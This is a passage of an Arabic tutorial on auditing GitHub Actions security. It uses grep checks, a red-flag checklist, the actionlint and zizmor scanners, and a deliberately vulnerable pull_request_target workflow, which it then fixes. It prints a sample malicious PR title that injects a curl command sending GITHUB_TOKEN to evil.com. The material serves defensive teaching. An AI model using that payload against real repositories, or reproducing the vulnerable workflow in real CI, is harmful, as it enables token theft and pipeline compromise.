<code>docker<\/code> (\u062a\u0634\u063a\u0644 \u062d\u0627\u0648\u064a\u0629)\u061f \u0644\u0643\u0644 \u0646\u0648\u0639 \u0645\u0644\u0641 \u0645\u062e\u0627\u0637\u0631 \u0645\u062e\u062a\u0644\u0641.<\/li>\n<li><strong>\u0627\u0644\u0645\u062f\u062e\u0644\u0627\u062a:<\/strong> \u0647\u0644 \u062a\u0642\u0628\u0644 \u0627\u0644\u0640 action \u0645\u062f\u062e\u0644\u0627\u062a \u062d\u0633\u0627\u0633\u0629 \u0645\u062b\u0644 \u0627\u0644\u0631\u0645\u0648\u0632 \u0627\u0644\u0645\u0645\u064a\u0632\u0629 \u0623\u0648 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f\u061f<\/li>\n<li><strong>\u0627\u0644\u0625\u062c\u0631\u0627\u0621 \u0627\u0644\u0644\u0627\u062d\u0642:<\/strong> \u0647\u0644 \u062a\u062d\u062f\u062f \u0646\u0642\u0637\u0629 \u062f\u062e\u0648\u0644 <code>post:<\/code>\u061f \u0627\u0644\u0625\u062c\u0631\u0627\u0621\u0627\u062a \u0627\u0644\u0644\u0627\u062d\u0642\u0629 \u062a\u0639\u0645\u0644 \u062d\u062a\u0649 \u0644\u0648 \u0641\u0634\u0644\u062a \u0627\u0644\u0648\u0638\u064a\u0641\u0629\u060c \u0645\u0645\u0627 \u064a\u062c\u0639\u0644\u0647\u0627 \u0645\u062b\u0627\u0644\u064a\u0629 \u0644\u0644\u062a\u0633\u0631\u064a\u0628.<\/li>\n<\/ul>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0641\u062d\u0635 \u0627\u0644\u0634\u064a\u0641\u0631\u0629 \u0627\u0644\u0645\u0635\u062f\u0631\u064a\u0629<\/h3>\n<p>\u0644\u0644\u0640 actions \u0627\u0644\u0645\u0628\u0646\u064a\u0629 \u0639\u0644\u0649 JavaScript\/TypeScript\u060c \u0627\u0641\u062d\u0635 \u0645\u0644\u0641 <code>dist\/index.js<\/code> \u0627\u0644\u0645\u064f\u062c\u0645\u0651\u0639 \u0648\u0627\u0644\u0645\u0635\u062f\u0631 \u0641\u064a <code>src\/<\/code>:<\/p>\n<pre><code># \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0633\u062a\u062f\u0639\u0627\u0621\u0627\u062a \u0627\u0644\u0634\u0628\u0643\u0629\ngrep -rn 'https\\?:\/\/' \/tmp\/audit-checkout\/src\/ | grep -v 'github.com\\|api.github.com'\n\n# \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u0648\u0635\u0648\u0644 \u0644\u0644\u0623\u0633\u0631\u0627\u0631\ngrep -rn 'GITHUB_TOKEN\\|process.env\\|getInput' \/tmp\/audit-checkout\/src\/\n\n# \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0641\u064a \u0645\u0648\u0627\u0642\u0639 \u062d\u0633\u0627\u0633\u0629\ngrep -rn 'GITHUB_ENV\\|GITHUB_OUTPUT\\|GITHUB_PATH' \/tmp\/audit-checkout\/src\/\n\n# \u0627\u0644\u0628\u062d\u062b \u0639\u0646 \u0627\u0633\u062a\u062f\u0639\u0627\u0621\u0627\u062a exec \u0623\u0648 spawn\ngrep -rn 'exec\\|spawn\\|child_process' \/tmp\/audit-checkout\/src\/<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0642\u0627\u0626\u0645\u0629 \u0641\u062d\u0635 \u0627\u0644\u0639\u0644\u0627\u0645\u0627\u062a \u0627\u0644\u062d\u0645\u0631\u0627\u0621<\/h3>\n<p>\u0627\u0633\u062a\u062e\u062f\u0645 \u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0641\u062d\u0635 \u0647\u0630\u0647 \u0639\u0646\u062f \u062a\u062f\u0642\u064a\u0642 \u0623\u064a GitHub Action:<\/p>\n<table>\n<thead>\n<tr>\n<th>\u0627\u0644\u0639\u0644\u0627\u0645\u0629 \u0627\u0644\u062d\u0645\u0631\u0627\u0621<\/th>\n<th>\u0645\u0627 \u0627\u0644\u0630\u064a \u062a\u0628\u062d\u062b \u0639\u0646\u0647<\/th>\n<th>\u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u062e\u0637\u0631<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\u0627\u0633\u062a\u062f\u0639\u0627\u0621\u0627\u062a \u0634\u0628\u0643\u0629 \u0644\u0646\u0637\u0627\u0642\u0627\u062a \u0645\u062c\u0647\u0648\u0644\u0629<\/td>\n<td><code>fetch()<\/code>\u060c <code>http.request()<\/code>\u060c <code>curl<\/code> \u0644\u0646\u0637\u0627\u0642\u0627\u062a \u063a\u064a\u0631 GitHub<\/td>\n<td>\u062d\u0631\u062c<\/td>\n<\/tr>\n<tr>\n<td>\u0627\u0644\u0648\u0635\u0648\u0644 \u0644\u0644\u0623\u0633\u0631\u0627\u0631<\/td>\n<td>\u0642\u0631\u0627\u0621\u0629 <code>GITHUB_TOKEN<\/code>\u060c <code>secrets.*<\/code>\u060c \u0623\u0648 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629<\/td>\n<td>\u0639\u0627\u0644\u064a<\/td>\n<\/tr>\n<tr>\n<td>\u0627\u0644\u062a\u0644\u0627\u0639\u0628 \u0628\u0627\u0644\u0628\u064a\u0626\u0629<\/td>\n<td>\u0627\u0644\u0643\u062a\u0627\u0628\u0629 \u0641\u064a <code>GITHUB_ENV<\/code>\u060c <code>GITHUB_OUTPUT<\/code>\u060c \u0623\u0648 <code>GITHUB_PATH<\/code><\/td>\n<td>\u0639\u0627\u0644\u064a<\/td>\n<\/tr>\n<tr>\n<td>\u062a\u0646\u0641\u064a\u0630 \u0634\u064a\u0641\u0631\u0629 \u062f\u064a\u0646\u0627\u0645\u064a\u0643\u064a\u0629<\/td>\n<td><code>eval()<\/code>\u060c <code>exec()<\/code>\u060c \u062a\u0646\u0632\u064a\u0644 \u0648\u062a\u0634\u063a\u064a\u0644 \u0633\u0643\u0631\u064a\u0628\u062a\u0627\u062a<\/td>\n<td>\u062d\u0631\u062c<\/td>\n<\/tr>\n<tr>\n<td>\u0634\u064a\u0641\u0631\u0629 \u0645\u0628\u0647\u0645\u0629<\/td>\n<td>\u0633\u0644\u0627\u0633\u0644 \u0645\u0634\u0641\u0631\u0629 \u0628\u0640 Base64\u060c \u0634\u064a\u0641\u0631\u0629 \u0645\u0635\u063a\u0631\u0629 \u0628\u062f\u0648\u0646 \u062e\u0631\u0627\u0626\u0637 \u0645\u0635\u062f\u0631<\/td>\n<td>\u0639\u0627\u0644\u064a<\/td>\n<\/tr>\n<tr>\n<td>\u062e\u0637\u0627\u0641\u0627\u062a \u0627\u0644\u0625\u062c\u0631\u0627\u0621 \u0627\u0644\u0644\u0627\u062d\u0642<\/td>\n<td>\u0646\u0642\u0637\u0629 \u062f\u062e\u0648\u0644 <code>post:<\/code> \u0641\u064a <code>action.yml<\/code><\/td>\n<td>\u0645\u062a\u0648\u0633\u0637<\/td>\n<\/tr>\n<tr>\n<td>\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0645\u0641\u0631\u0637\u0629 \u0645\u0637\u0644\u0648\u0628\u0629<\/td>\n<td>\u0627\u0644\u062a\u0648\u062b\u064a\u0642 \u064a\u0637\u0644\u0628 \u0635\u0644\u0627\u062d\u064a\u0627\u062a <code>write<\/code> \u0623\u0643\u062b\u0631 \u0645\u0645\u0627 \u0647\u0648 \u0645\u0637\u0644\u0648\u0628<\/td>\n<td>\u0645\u062a\u0648\u0633\u0637<\/td>\n<\/tr>\n<tr>\n<td>\u0644\u0627 \u062a\u062d\u0642\u0642 \u0623\u0648 \u062a\u0648\u0642\u064a\u0639<\/td>\n<td>\u0627\u0644\u0640 action \u0644\u064a\u0633\u062a \u0645\u0646 \u0645\u0646\u0634\u0626 \u0645\u0648\u062b\u0642\u060c \u0644\u0627 \u062a\u0648\u0642\u064a\u0639\u0627\u062a Sigstore<\/td>\n<td>\u0645\u0646\u062e\u0641\u0636-\u0645\u062a\u0648\u0633\u0637<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 5: \u0645\u062b\u0627\u0644 \u0639\u0644\u0649 \u0627\u0644\u062a\u062f\u0642\u064a\u0642 \u2014 <code>actions\/checkout@v4<\/code><\/h3>\n<p>\u0625\u0644\u064a\u0643 \u062a\u062f\u0642\u064a\u0642\u064b\u0627 \u0645\u062e\u062a\u0635\u0631\u064b\u0627 \u0644\u0640 <code>actions\/checkout@v4<\/code>:<\/p>\n<pre><code># \u062a\u062d\u0644\u064a\u0644 action.yml\n# - \u0627\u0644\u0646\u0648\u0639: node20 (action \u0628\u0644\u063a\u0629 JavaScript)\n# - \u0627\u0644\u0645\u062f\u062e\u0644\u0627\u062a: \u064a\u0642\u0628\u0644 \u0645\u062f\u062e\u0644 'token' (\u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a github.token)\n# - \u0627\u0644\u0625\u062c\u0631\u0627\u0621 \u0627\u0644\u0644\u0627\u062d\u0642: \u0646\u0639\u0645 \u2014 \u064a\u0634\u063a\u0644 \u062a\u0646\u0638\u064a\u0641 \u0644\u0625\u0632\u0627\u0644\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f\n\n# \u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0634\u0628\u0643\u0629\n# - \u064a\u062a\u0635\u0644 \u0628\u0640: api.github.com (\u0645\u062a\u0648\u0642\u0639 \u0644\u0639\u0645\u0644\u064a\u0627\u062a git)\n# - \u0644\u0627 \u0627\u062a\u0635\u0627\u0644\u0627\u062a \u0628\u0646\u0637\u0627\u0642\u0627\u062a \u0623\u0637\u0631\u0627\u0641 \u062b\u0627\u0644\u062b\u0629 \u2713\n\n# \u0627\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639 \u0627\u0644\u0623\u0633\u0631\u0627\u0631\n# - \u064a\u0633\u062a\u062e\u062f\u0645 GITHUB_TOKEN \u0644\u0627\u0633\u062a\u0646\u0633\u0627\u062e git \u0627\u0644\u0645\u0635\u0627\u062f\u0642 \u0639\u0644\u064a\u0647\n# - \u064a\u062a\u0645 \u062d\u0641\u0638 \u0627\u0644\u0631\u0645\u0632 \u0641\u064a \u062a\u0643\u0648\u064a\u0646 git \u0627\u0641\u062a\u0631\u0627\u0636\u064a\u064b\u0627 (\u0645\u062f\u062e\u0644 persist-credentials)\n# - \u0627\u0644\u0625\u062c\u0631\u0627\u0621 \u0627\u0644\u0644\u0627\u062d\u0642 \u064a\u0632\u064a\u0644 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f \u0627\u0644\u0645\u062d\u0641\u0648\u0638\u0629\n\n# \u0643\u062a\u0627\u0628\u0629 \u0627\u0644\u0628\u064a\u0626\u0629\n# - \u0644\u0627 \u064a\u0643\u062a\u0628 \u0641\u064a GITHUB_ENV \u0623\u0648 GITHUB_PATH \u2713\n\n# \u0627\u0644\u062d\u0643\u0645: \u0622\u0645\u0646 \u2014 \u0627\u0644\u0633\u0644\u0648\u0643 \u064a\u0637\u0627\u0628\u0642 \u0627\u0644\u063a\u0631\u0636 \u0627\u0644\u0645\u0648\u062b\u0642\n# \u0627\u0644\u062a\u0648\u0635\u064a\u0629: \u0627\u0636\u0628\u0637 persist-credentials: false \u0644\u062a\u0642\u0644\u064a\u0644 \u062a\u0639\u0631\u0636 \u0627\u0644\u0631\u0645\u0632<\/code><\/pre>\n<p>\u0637\u0628\u0651\u0642 \u0646\u0641\u0633 \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0639\u0644\u0649 \u0643\u0644 action \u062c\u062f\u064a\u062f\u0629 \u0642\u0628\u0644 \u0625\u0636\u0627\u0641\u062a\u0647\u0627 \u0625\u0644\u0649 \u0645\u0633\u0627\u0631\u0627\u062a \u0639\u0645\u0644\u0643.<\/p>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 2: \u0641\u062d\u0635 \u0627\u0644\u0640 Actions \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 actionlint<\/h2>\n<p><a href=\"https:\/\/github.com\/rhysd\/actionlint\" target=\"_blank\" rel=\"noopener\">actionlint<\/a> \u0647\u0648 \u0623\u062f\u0627\u0629 \u062a\u062d\u0644\u064a\u0644 \u062b\u0627\u0628\u062a \u0644\u0645\u0644\u0641\u0627\u062a \u0645\u0633\u0627\u0631\u0627\u062a \u0639\u0645\u0644 GitHub Actions. \u064a\u0643\u062a\u0634\u0641 \u0623\u062e\u0637\u0627\u0621 \u0627\u0644\u0635\u064a\u0627\u063a\u0629\u060c \u0648\u0639\u062f\u0645 \u062a\u0637\u0627\u0628\u0642 \u0627\u0644\u0623\u0646\u0648\u0627\u0639\u060c \u0648\u0627\u0644\u0623\u0647\u0645 \u0644\u0623\u063a\u0631\u0627\u0636\u0646\u0627 \u2014 \u062b\u063a\u0631\u0627\u062a \u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u062a\u062b\u0628\u064a\u062a actionlint<\/h3>\n<pre><code># macOS\nbrew install actionlint\n\n# Linux (\u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u062a\u0646\u0641\u064a\u0630\u064a)\ncurl -sL https:\/\/github.com\/rhysd\/actionlint\/releases\/latest\/download\/actionlint_linux_amd64.tar.gz | tar xz\nsudo mv actionlint \/usr\/local\/bin\/\n\n# \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u062a\u062b\u0628\u064a\u062a\nactionlint --version<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0639\u0644\u0649 \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/h3>\n<pre><code>actionlint .github\/workflows\/*.yml<\/code><\/pre>\n<p>\u0644\u0645\u0633\u0627\u0631 \u0639\u0645\u0644 CI \u0627\u0644\u0646\u0645\u0648\u0630\u062c\u064a \u0644\u062f\u064a\u0646\u0627\u060c \u0633\u064a\u0646\u062a\u062c actionlint \u0645\u062e\u0631\u062c\u0627\u062a \u0646\u0638\u064a\u0641\u0629 \u0644\u0623\u0646\u0646\u0627 \u0627\u062a\u0628\u0639\u0646\u0627 \u0627\u0644\u0645\u0645\u0627\u0631\u0633\u0627\u062a \u0627\u0644\u062c\u064a\u062f\u0629. \u062f\u0639\u0646\u0627 \u0646\u0646\u0634\u0626 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u0636\u0639\u064a\u0641 \u0644\u0646\u0631\u0649 \u0642\u062f\u0631\u0627\u062a \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0623\u0645\u0627\u0646 \u0641\u064a actionlint.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0625\u0646\u0634\u0627\u0621 \u0645\u0633\u0627\u0631 \u0639\u0645\u0644 \u0636\u0639\u064a\u0641<\/h3>\n<p>\u0623\u0646\u0634\u0626 <code>.github\/workflows\/greet-pr.yml<\/code> \u0645\u0639 \u062b\u063a\u0631\u0627\u062a \u0645\u062a\u0639\u0645\u062f\u0629:<\/p>\n<pre><code>name: Greet PR\non:\n  pull_request_target:\n    types: [opened]\n\njobs:\n  greet:\n    runs-on: ubuntu-latest\n    permissions:\n      pull-requests: write\n    steps:\n      - name: Greet the contributor\n        run: |\n          echo \"PR Title: ${{ github.event.pull_request.title }}\"\n          echo \"PR Author: ${{ github.event.pull_request.user.login }}\"\n          echo \"PR Body: ${{ github.event.pull_request.body }}\"\n        env:\n          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}\n\n      - name: Post comment\n        run: |\n          curl -X POST \\\n            -H \"Authorization: token $GITHUB_TOKEN\" \\\n            -H \"Accept: application\/vnd.github.v3+json\" \\\n            https:\/\/api.github.com\/repos\/${{ github.repository }}\/issues\/${{ github.event.pull_request.number }}\/comments \\\n            -d '{\"body\": \"Welcome, ${{ github.event.pull_request.user.login }}! Thanks for your PR: ${{ github.event.pull_request.title }}\"}'<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0641\u062d\u0635 \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0636\u0639\u064a\u0641<\/h3>\n<pre><code>actionlint .github\/workflows\/greet-pr.yml<\/code><\/pre>\n<p>\u0633\u064a\u064f\u0628\u0644\u0651\u063a actionlint \u0639\u0646 \u062b\u063a\u0631\u0627\u062a \u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a:<\/p>\n<pre><code>.github\/workflows\/greet-pr.yml:14:27: expression injection: \n  \"github.event.pull_request.title\" is potentially untrusted. \n  Consider using an environment variable instead. \n  [expression]\n.github\/workflows\/greet-pr.yml:16:25: expression injection: \n  \"github.event.pull_request.body\" is potentially untrusted. \n  Consider using an environment variable instead. \n  [expression]<\/code><\/pre>\n<p>\u062d\u0642\u0648\u0644 <code>title<\/code> \u0648<code>body<\/code> \u064a\u062a\u062d\u0643\u0645 \u0628\u0647\u0627 \u0643\u0627\u062a\u0628 \u0627\u0644\u0640 PR. \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0635\u064a\u0627\u063a\u0629 \u0639\u0646\u0648\u0627\u0646 PR \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0645\u062d\u0627\u0631\u0641 \u062e\u0627\u0635\u0629 \u0628\u0627\u0644\u0635\u062f\u0641\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0639\u0634\u0648\u0627\u0626\u064a\u0629:<\/p>\n<pre><code># \u0639\u0646\u0648\u0627\u0646 PR \u062e\u0628\u064a\u062b:\nInnocent Title\"; curl -s https:\/\/evil.com\/steal?token=$GITHUB_TOKEN; echo \"<\/code><\/pre>\n<p>\u0639\u0646\u062f\u0645\u0627 \u064a\u062a\u0645 \u0627\u0633\u062a\u0643\u0645\u0627\u0644 \u0647\u0630\u0627 \u0627\u0644\u0639\u0646\u0648\u0627\u0646 \u0645\u0628\u0627\u0634\u0631\u0629 \u0641\u064a \u0643\u062a\u0644\u0629 <code>run:<\/code> \u0639\u0628\u0631 <code>${{ }}<\/code>\u060c \u062a\u0646\u0641\u0630 \u0627\u0644\u0635\u062f\u0641\u0629 \u0627\u0644\u0623\u0645\u0631 \u0627\u0644\u0645\u062d\u0642\u0648\u0646.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 5: \u0625\u0635\u0644\u0627\u062d \u0627\u0644\u062b\u063a\u0631\u0629<\/h3>\n<p>\u0627\u0644\u0625\u0635\u0644\u0627\u062d \u0647\u0648 \u062a\u0645\u0631\u064a\u0631 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u063a\u064a\u0631 \u0627\u0644\u0645\u0648\u062b\u0648\u0642\u0629 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 \u0628\u062f\u0644\u0627\u064b \u0645\u0646 \u0627\u0644\u0627\u0633\u062a\u0643\u0645\u0627\u0644 \u0627\u0644\u0645\u0628\u0627\u0634\u0631:<\/p>\n<pre><code>name: Greet PR (Fixed)\non:\n  pull_request_target:\n    types: [opened]\n\njobs:\n  greet:\n    runs-on: ubuntu-latest\n    permissions:\n      pull-requests: write\n    steps:\n      - name: Greet the contributor\n        run: |\n          echo \"PR Title: $PR_TITLE\"\n          echo \"PR Author: $PR_AUTHOR\"\n          echo \"PR Body: $PR_BODY\"\n        env:\n          PR_TITLE: ${{ github.event.pull_request.title }}\n          PR_AUTHOR: ${{ github.event.pull_request.user.login }}\n          PR_BODY: ${{ github.event.pull_request.body }}\n          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}\n\n      - name: Post comment\n        uses: actions\/github-script@v7\n        with:\n          script: |\n            await github.rest.issues.createComment({\n              owner: context.repo.owner,\n              repo: context.repo.repo,\n              issue_number: context.payload.pull_request.number,\n              body: `Welcome, ${context.payload.pull_request.user.login}! Thanks for your PR.`\n            });<\/code><\/pre>\n<p>\u0645\u062a\u063a\u064a\u0631\u0627\u062a \u0627\u0644\u0628\u064a\u0626\u0629 \u062a\u064f\u0645\u0631\u0631 \u0643\u0628\u064a\u0627\u0646\u0627\u062a\u060c \u0648\u0644\u0627 \u064a\u062a\u0645 \u0627\u0633\u062a\u0643\u0645\u0627\u0644\u0647\u0627 \u0641\u064a \u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u0635\u062f\u0641\u0629\u060c \u0645\u0645\u0627 \u064a\u0645\u0646\u0639 \u0627\u0644\u062d\u0642\u0646. \u0623\u0639\u062f \u062a\u0634\u063a\u064a\u0644 actionlint \u0644\u0644\u062a\u0623\u0643\u062f \u0645\u0646 \u0627\u0644\u0625\u0635\u0644\u0627\u062d:<\/p>\n<pre><code>actionlint .github\/workflows\/greet-pr-fixed.yml\n# \u0644\u0627 \u0645\u062e\u0631\u062c\u0627\u062a = \u0644\u0627 \u0645\u0634\u0627\u0643\u0644<\/code><\/pre>\n<h2>\u0627\u0644\u062a\u0645\u0631\u064a\u0646 3: \u0627\u0644\u0641\u062d\u0635 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 zizmor<\/h2>\n<p><a href=\"https:\/\/github.com\/woodruffw\/zizmor\" target=\"_blank\" rel=\"noopener\">zizmor<\/a> \u0647\u0648 \u0623\u062f\u0627\u0629 \u062a\u062d\u0644\u064a\u0644 \u062b\u0627\u0628\u062a \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u0627\u0644\u0623\u0645\u0627\u0646 \u0648\u0645\u0635\u0645\u0645\u0629 \u062e\u0635\u064a\u0635\u064b\u0627 \u0644\u0640 GitHub Actions. \u0628\u064a\u0646\u0645\u0627 \u064a\u0631\u0643\u0632 actionlint \u0639\u0644\u0649 \u0627\u0644\u0635\u062d\u0629 \u0645\u0639 \u0628\u0639\u0636 \u0641\u062d\u0648\u0635\u0627\u062a \u0627\u0644\u0623\u0645\u0627\u0646\u060c \u064a\u0631\u0643\u0632 zizmor \u062d\u0635\u0631\u064a\u064b\u0627 \u0639\u0644\u0649 \u0627\u0644\u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u0645\u0636\u0627\u062f\u0629 \u0644\u0644\u0623\u0645\u0627\u0646.<\/p>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 1: \u062a\u062b\u0628\u064a\u062a zizmor<\/h3>\n<pre><code># \u0627\u0644\u062a\u062b\u0628\u064a\u062a \u0639\u0628\u0631 pip\npip install zizmor\n\n# \u0623\u0648 \u0639\u0628\u0631 pipx \u0644\u0644\u0639\u0632\u0644\npipx install zizmor\n\n# \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u062a\u062b\u0628\u064a\u062a\nzizmor --version<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 2: \u0627\u0644\u062a\u0634\u063a\u064a\u0644 \u0639\u0644\u0649 \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644<\/h3>\n<pre><code>zizmor .github\/workflows\/<\/code><\/pre>\n<p>\u064a\u062d\u0644\u0644 zizmor \u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0639\u0645\u0644 \u0644\u0645\u062c\u0645\u0648\u0639\u0629 \u0634\u0627\u0645\u0644\u0629 \u0645\u0646 \u0627\u0644\u0645\u0634\u0627\u0643\u0644 \u0627\u0644\u0623\u0645\u0646\u064a\u0629. \u0639\u0644\u0649 \u0645\u0644\u0641 <code>ci.yml<\/code> \u0627\u0644\u0646\u0645\u0648\u0630\u062c\u064a \u0644\u062f\u064a\u0646\u0627\u060c \u0633\u064a\u064f\u0628\u0644\u0651\u063a \u0639\u0646:<\/p>\n<pre><code>ci.yml:15:9 warning[unpinned-uses]: unpinned 3rd-party action reference\n  |\n15|       - uses: actions\/checkout@v4\n  |         ^^^^ action not pinned to a full-length commit SHA\n  |\n  = note: Pinning actions to a full SHA protects against tag mutation attacks\n\nci.yml:17:9 warning[unpinned-uses]: unpinned 3rd-party action reference\n  |\n17|       - uses: actions\/setup-node@v4\n  |         ^^^^ action not pinned to a full-length commit SHA\n\nci.yml:20:9 warning[unpinned-uses]: unpinned 3rd-party action reference\n  |\n20|       - uses: actions\/cache@v4\n  |         ^^^^ action not pinned to a full-length commit SHA<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 3: \u0641\u062d\u0635 \u0645\u0633\u0627\u0631 \u0627\u0644\u0639\u0645\u0644 \u0627\u0644\u0636\u0639\u064a\u0641<\/h3>\n<pre><code>zizmor .github\/workflows\/greet-pr.yml<\/code><\/pre>\n<p>\u0633\u064a\u0646\u062a\u062c zizmor \u0646\u062a\u0627\u0626\u062c \u0623\u0645\u0646\u064a\u0629 \u0623\u063a\u0646\u0649:<\/p>\n<pre><code>greet-pr.yml:4:5 warning[dangerous-trigger]: use of dangerous trigger\n  |\n4 |   pull_request_target:\n  |   ^^^^^^^^^^^^^^^^^^^^ pull_request_target runs in the context of the base branch\n  |\n  = note: This trigger has access to repository secrets and a read-write token\n\ngreet-pr.yml:14:27 error[template-injection]: template injection in run: block\n  |\n14|          echo \"PR Title: ${{ github.event.pull_request.title }}\"\n  |                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  |\n  = note: Attacker-controlled input is interpolated directly into a shell command\n\ngreet-pr.yml:15:9 warning[unpinned-uses]: no actions pinned by SHA\n  |\n  = note: All third-party actions should be pinned to full commit SHAs\n\ngreet-pr.yml:12:5 warning[excessive-permissions]: permissions may be overly broad\n  |\n  = note: Consider using read-only permissions where possible<\/code><\/pre>\n<h3>\u0627\u0644\u062e\u0637\u0648\u0629 4: \u0645\u0642\u0627\u0631\u0646\u0629 actionlint \u0648zizmor<\/h3>\n<table>\n<thead>\n<tr>\n<th>\u0627\u0644\u0645\u064a\u0632\u0629<\/th>\n<th>actionlint<\/th>\n<th>zizmor<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\u0627\u0644\u062a\u0631\u0643\u064a\u0632 \u0627\u0644\u0623\u0633\u0627\u0633\u064a<\/td>\n<td>\u0627\u0644\u0635\u062d\u0629 \u0648\u0627\u0644\u0635\u064a\u0627\u063a\u0629<\/td>\n<td>\u0627\u0644\u062a\u062d\u0644\u064a\u0644 \u0627\u0644\u0623\u0645\u0646\u064a<\/td>\n<\/tr>\n<tr>\n<td>\u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<td>\u0646\u0639\u0645 (\u0623\u0643\u062b\u0631 \u0634\u0645\u0648\u0644\u0627\u064b)<\/td>\n<\/tr>\n<tr>\n<td>actions \u063a\u064a\u0631 \u0645\u062b\u0628\u062a\u0629<\/td>\n<td>\u0644\u0627<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u0627\u0644\u0645\u064f\u062d\u0641\u0651\u0632\u0627\u062a \u0627\u0644\u062e\u0637\u0631\u0629<\/td>\n<td>\u0644\u0627<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u0641\u0631\u0637\u0629<\/td>\n<td>\u0644\u0627<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u062a\u0633\u0645\u064a\u0645 \u0627\u0644\u0645\u062e\u0631\u062c\u0627\u062a<\/td>\n<td>\u0644\u0627<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u062e\u0637\u0623 \u062a\u0643\u0648\u064a\u0646 OIDC<\/td>\n<td>\u0644\u0627<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<\/tr>\n<tr>\n<td>\u0641\u062d\u0635 \u0627\u0644\u0623\u0646\u0648\u0627\u0639<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<td>\u0644\u0627<\/td>\n<\/tr>\n<tr>\n<td>\u0627\u0644\u0635\u064a\u0627\u063a\u0629 \u0627\u0644\u0645\u0647\u0645\u0644\u0629<\/td>\n<td>\u0646\u0639\u0645<\/td>\n<td>\u0644\u0627<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong>\u0627\u0644\u062a\u0648\u0635\u064a\u0629:<\/strong> \u0627\u0633\u062a\u062e\u062f\u0645 \u0643\u0644\u062a\u0627 \u0627\u0644\u0623\u062f\u0627\u062a\u064a\u0646 \u0645\u0639\u064b\u0627. \u064a\u0643\u062a\u0634\u0641 actionlint \u0645\u0634\u0627\u0643\u0644 \u0627\u0644\u0635\u062d\u0629 \u0648\u0623\u0646\u0645\u0627\u0637 \u0627\u0644\u062d\u0642\u0646 